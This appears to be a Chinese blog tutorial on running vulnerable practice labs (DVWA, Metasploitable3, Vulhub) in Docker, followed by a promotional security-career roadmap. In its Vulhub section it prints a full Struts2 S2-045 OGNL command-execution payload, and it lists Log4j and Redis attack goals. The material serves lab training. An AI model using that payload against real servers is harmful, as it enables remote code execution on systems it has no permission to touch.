企业网站建设及维护费用网页设计模板素材图片

企业网站建设及维护费用,网页设计模板素材图片,石狮网站建设费用,成都装修设计公司网站Docker 搭建漏洞环境#xff1a;转行网络安全高效练手的方法#xff08;附镜像清单#xff09; 引言 我转行时搭建 DVWA 靶场#xff0c;装 LAMP 环境花了 2 天 —— 改配置文件、解决依赖冲突#xff0c;最后还是报错#xff1b;后来用 Docker#xff0c;一条命令就启…Docker 搭建漏洞环境转行网络安全高效练手的方法附镜像清单引言我转行时搭建 DVWA 靶场装 LAMP 环境花了 2 天 —— 改配置文件、解决依赖冲突最后还是报错后来用 Docker一条命令就启动了 DVWA5 分钟搞定。Docker 是 “容器化工具”能快速部署漏洞环境不用配置复杂依赖是网络安全练手的 “效率神器”。本文从 “Docker 安装 - 基础命令 - 漏洞环境搭建” 讲解附 10 个常用漏洞镜像清单新手跟着做就能快速练手。一、先搞懂Docker 是什么为什么适合练手1. 基本定位Docker 是 “容器引擎”能将应用程序和依赖如 Apache、MySQL、PHP打包成 “镜像”通过 “容器” 运行 —— 简单说镜像就是 “预制好的环境模板”容器就是 “运行中的环境”不用手动装依赖启动镜像就能用。2. 练手优势转行生必知快5 分钟部署一个漏洞环境如 DVWA比手动装环境快 10 倍干净每个容器独立删除容器后不留垃圾文件不会污染本地系统全有大量现成的漏洞镜像如 DVWA、Metasploitable3不用自己造环境跨平台Windows/Mac/Linux 都能用配置步骤一致。二、第一步Docker 安装以 Windows 10 为例Mac/Linux 类似1. 系统要求Windows 10 专业版 / 企业版需开启 Hyper-V家庭版需装 WSL2MacmacOS 10.15Catalina 及以上LinuxUbuntu 18.04、CentOS 7。2. Windows 安装步骤下载 Docker Desktop官网https://www.docker.com/products/docker-desktop/→“Download for Windows”双击安装包勾选 “Use WSL 2 instead of Hyper-V”推荐用 WSL2更轻量→“OK”等待安装完成安装后启动 Docker Desktop右下角托盘显示 Docker 图标蓝色鲸鱼说明启动成功测试打开 CMD 或 PowerShell输入docker --version显示版本信息如Docker version 25.0.0, build e758fe5说明安装成功。3. 新手必做换国内镜像源解决 “拉取镜像慢”Docker 默认镜像源在国外拉取慢换国内源如阿里云打开 Docker Desktop→“Settings”→“Docker Engine”在 “registry-mirrors” 中添加国内源如下{ registry-mirrors: [ https://xxxx.mirror.aliyuncs.com, // 替换为你的阿里云镜像加速地址阿里云官网可免费申请 https://hub-mirror.c.163.com, https://mirror.baidubce.com ] }点击 “Apply Restart”重启 Docker 生效。三、Docker 基础命令新手必记 10 个命令作用示例docker pull 镜像名:标签拉取镜像从 Docker Hub 下载docker pull citizenstig/dvwa拉取 DVWA 镜像docker images查看本地所有镜像显示镜像名、标签、ID、大小docker run -d -p 本地端口:容器端口 镜像名启动容器-d 后台运行-p 端口映射docker run -d -p 8080:80 citizenstig/dvwa将容器 80 端口映射到本地 8080 端口docker ps查看正在运行的容器显示容器 ID、镜像名、端口映射docker ps -a查看所有容器包括停止的显示已停止的容器docker stop 容器ID/容器名停止容器docker stop abc123停止 ID 为 abc123 的容器docker start 容器ID/容器名启动已停止的容器docker start abc123docker rm 容器ID/容器名删除容器需先停止docker rm abc123docker rmi 镜像ID/镜像名删除镜像需先删除依赖该镜像的容器docker rmi citizenstig/dvwadocker exec -it 容器ID/容器名 /bin/bash进入容器命令行交互模式docker exec -it abc123 /bin/bash进入容器执行 Linux 命令四、实战用 Docker 搭建 5 个常用漏洞环境新手必练1. 环境 1DVWAWeb 安全入门首选SQL 注入、XSS 漏洞步骤拉取镜像docker pull citizenstig/dvwa启动容器docker run -d -p 8080:80 citizenstig/dvwa本地 8080 端口映射容器 80 端口访问打开浏览器输入http://localhost:8080登录默认账号admin密码password配置登录后点击 “Create / Reset Database”创建数据库即可开始练手安全级别设为 “Low”。2. 环境 2Metasploitable3漏洞集合适合渗透测试练手步骤拉取镜像需先装 gitgit clone https://github.com/rapid7/metasploitable3.git进入目录cd metasploitable3启动容器Windows 用 PowerShell.\build.ps1自动拉取镜像并启动约 10-20 分钟查看容器docker ps找到metasploitable3-ub1404Ubuntu 14.04 漏洞环境记录 IP如 172.17.0.2练手用 Kali 的 Metasploit 攻击该 IP如攻击永恒之蓝漏洞。3. 环境 3Vulhub漏洞集合支持多漏洞场景步骤拉取镜像以 “Apache Struts2 S2-045 漏洞” 为例docker pull vulhub/struts2:2.3.32启动容器docker run -d -p 8081:8080 vulhub/struts2:2.3.32本地 8081 端口映射容器 8080 端口访问http://localhost:8081看到 Struts2 页面说明启动成功练手用 Burp Suite 发送漏洞利用 payload执行命令如%{(#_‘multipart/form-data’).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm)(#container#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd‘whoami’).(#iswin(java.lang.SystemgetProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())}。4. 环境 4OWASP ZAPWeb 漏洞扫描工具Docker 版免安装步骤拉取镜像docker pull owasp/zap2docker-stable启动容器docker run -d -p 8082:8080 owasp/zap2docker-stable zap.sh -daemon -host 0.0.0.0 -port 8080 -config api.key123456api.key 用于访问 API访问http://localhost:8082进入 ZAP 界面可进行漏洞扫描练手。5. 环境 5ELK Stack日志分析环境安全运维练手步骤拉取镜像需 docker-compose先装 docker-composegit clone https://github.com/deviantony/docker-elk.git进入目录cd docker-elk启动容器docker-compose up -d自动启动 Elasticsearch、Logstash、Kibana访问 Kibanahttp://localhost:5601进入日志分析界面可上传日志练手。五、转行必备10 个常用漏洞镜像清单附用途镜像名用途练手重点citizenstig/dvwaWeb 漏洞入门SQL 注入、XSS、文件上传手动注入、Burp 抓包改包rapid7/metasploitable3渗透测试综合练手系统漏洞、Web 漏洞Metasploit 漏洞利用vulhub/struts2:2.3.32Apache Struts2 漏洞S2-045 等命令执行漏洞利用vulhub/log4j:2.14.1Log4j2 漏洞CVE-2021-44228JNDI 注入漏洞利用owasp/zap2docker-stableWeb 漏洞扫描工具自动化扫描、漏洞验证elasticsearch:7.14.0Elasticsearch 漏洞如未授权访问未授权访问、数据泄露测试mysql:5.7MySQL 漏洞如弱密码、未授权访问暴力破解、SQL 注入redis:5.0Redis 漏洞如未授权访问、主从复制漏洞未授权访问、写入公钥nginx:1.18.0Nginx 漏洞如解析漏洞、目录遍历解析漏洞利用、文件读取node:14.17.0Node.js 漏洞如命令注入、路径遍历命令执行、文件上传六、转行应用简历怎么写 Docker 技能技能栏“熟练使用 Docker 搭建网络安全练手环境能部署 DVWA、Metasploitable3 等漏洞镜像通过容器化方式高效进行 Web 渗透、漏洞利用练手”项目经验“使用 Docker 部署 DVWA、Vulhub 等漏洞环境完成 SQL 注入、XSS、Log4j2 漏洞的实战练习编写 5 篇漏洞利用报告积累渗透测试经验”。总结Docker 入门的核心是 “安装 - 拉镜像 - 启容器 - 练手”新手不用学复杂的容器编排如 docker-compose 进阶先掌握基础命令和 5 个常用漏洞环境的搭建就能高效积累实战经验为转行网络安全打基础。评论区说说你想搭建的漏洞环境帮你出步骤网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失